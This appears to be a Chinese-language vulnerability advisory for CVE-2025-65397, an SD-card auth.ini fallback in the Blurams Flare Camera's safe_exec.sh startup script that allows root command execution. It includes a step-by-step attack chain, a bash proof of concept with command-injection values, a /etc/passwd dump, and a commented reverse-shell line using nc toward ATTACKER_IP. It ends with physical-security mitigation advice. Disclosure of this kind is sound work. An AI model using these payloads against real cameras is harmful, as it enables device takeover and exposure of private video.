CVE-2025-65397 Blurams Flare Camera不安全认证导致root命令执行

漏洞信息

漏洞编号

CVE-2025-65397

漏洞类型

不安全的认证机制/权限提升

CVSS评分

6.8 中危

攻击向量

物理 (AV:P)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Blurams Flare Camera

漏洞概述

CVE-2025-65397是Blurams Flare Camera设备中的一个高危安全漏洞，存在于safe_exec.sh启动脚本中。该漏洞允许具有物理设备访问权限的攻击者在特定条件下绕过安全认证机制，以root用户权限在设备上执行任意命令。漏洞的触发条件相对简单：当设备文件系统中不存在/opt/images/public_key.der文件时，启动脚本会使用不安全的认证方式。攻击者只需在SD卡上放置一个恶意构造的auth.ini文件即可利用此漏洞。由于Blurams Flare Camera是一款智能家居摄像头产品，广泛部署在家庭和商业环境中，此漏洞的存在可能导致用户隐私视频泄露、设备被完全控制以及作为僵尸网络节点等严重安全风险。攻击者成功利用此漏洞后，可以完全接管设备，获取设备的完整控制权。

技术细节

漏洞根源在于safe_exec.sh启动脚本中的认证机制设计缺陷。在正常情况下，设备应该使用公钥加密进行身份验证，公钥文件存储在/opt/images/public_key.der。当系统检测到该文件不存在时，脚本会回退到一种不安全的认证模式，此时会读取SD卡根目录下的auth.ini文件进行身份验证。攻击者可以通过以下步骤利用此漏洞：1）格式化SD卡为FAT32文件系统；2）创建恶意的auth.ini文件，该文件包含精心构造的认证数据；3）将SD卡插入目标设备；4）重启设备使其加载启动脚本；5）启动脚本读取并解析auth.ini文件，由于缺乏适当的安全验证，攻击者注入的命令将以root权限执行。CVSS 3.1评分6.8（中等）反映了该漏洞需要物理访问这一限制因素，但由于其可导致完整的系统 compromise（机密性、完整性和可用性均为高），因此仍具有较高的实际威胁。

攻击链分析

STEP 1

步骤1

准备FAT32格式化的SD卡，确保其根目录为空或可写入

STEP 2

步骤2

创建恶意的auth.ini文件，包含用于绕过认证或执行命令的数据

STEP 3

步骤3

将auth.ini文件复制到SD卡根目录

STEP 4

步骤4

物理访问Blurams Flare Camera设备，将SD卡插入设备卡槽

STEP 5

步骤5

确认设备文件系统中的/opt/images/public_key.der文件不存在，以触发不安全的认证回退机制

STEP 6

步骤6

重启设备，触发safe_exec.sh启动脚本执行

STEP 7

步骤7

启动脚本检测到public_key.der不存在，读取SD卡上的auth.ini文件

STEP 8

步骤8

由于缺乏输入验证，auth.ini中的恶意数据被解析并以root权限执行

STEP 9

步骤9

攻击者获得设备的root shell访问权限，实现完全控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2025-65397 PoC - Blurams Flare Camera Authentication Bypass
# Author: Security Researcher
# Description: Exploit for unsafe authentication in safe_exec.sh startup script

# Prerequisites: Physical access to Blurams Flare Camera device

# Step 1: Prepare SD card (must be FAT32 formatted)
# Insert SD card and format it
# sudo mkfs.vfat -F 32 /dev/sdX

# Step 2: Create malicious auth.ini file
# The auth.ini file contains authentication data that exploits
# the insecure fallback authentication mechanism

cat > auth.ini << 'EOF'
[auth]
username=root
password=;reboot;
# Alternative payload for reverse shell:
# password=;nc -e /bin/sh ATTACKER_IP 4444;

[exec]
command=;cat /etc/passwd > /tmp/passwd_dump;chmod 777 /tmp/passwd_dump;
EOF

# Step 3: Copy malicious auth.ini to SD card root
cp auth.ini /media/sdcard/

# Step 4: Insert SD card into Blurams Flare Camera device
# Ensure /opt/images/public_key.der does NOT exist on the device
# If it exists, the device uses secure authentication

# Step 5: Reboot the device
# The safe_exec.sh startup script will:
# - Check for /opt/images/public_key.der (should not exist)
# - Fall back to reading auth.ini from SD card
# - Execute commands with root privileges

# Step 6: Extract data after exploitation
# ssh root@device_ip  # or access via UART/JTAG

# Note: This PoC demonstrates the vulnerability. Use only for authorized testing.

影响范围

Blurams Flare Camera <= 24.1114.151.929

防御指南

临时缓解措施

由于该漏洞需要物理访问设备才能利用，因此物理安全控制是首要缓解措施。建议将设备放置在受控环境中，限制未授权人员接触。临时措施包括：1）确保设备外壳完整且上锁，防止直接访问SD卡槽；2）监控设备物理状态，检测是否有异常拆解痕迹；3）如果怀疑设备已被篡改，立即断开网络连接并进行安全检查；4）考虑使用防篡改标签或传感器；5）定期审计设备日志，查找异常行为。最终解决方案需等待厂商发布安全更新以修复safe_exec.sh中的认证机制缺陷。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-65397
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-65397
3 Details https://www.cvedetails.com/cve/CVE-2025-65397/
4 VulDB https://vuldb.com/cve/CVE-2025-65397
5 Link http://blurams.com
6 Link http://flare.com
7 Link https://lessonsec.com/cve/cve-2025-65397/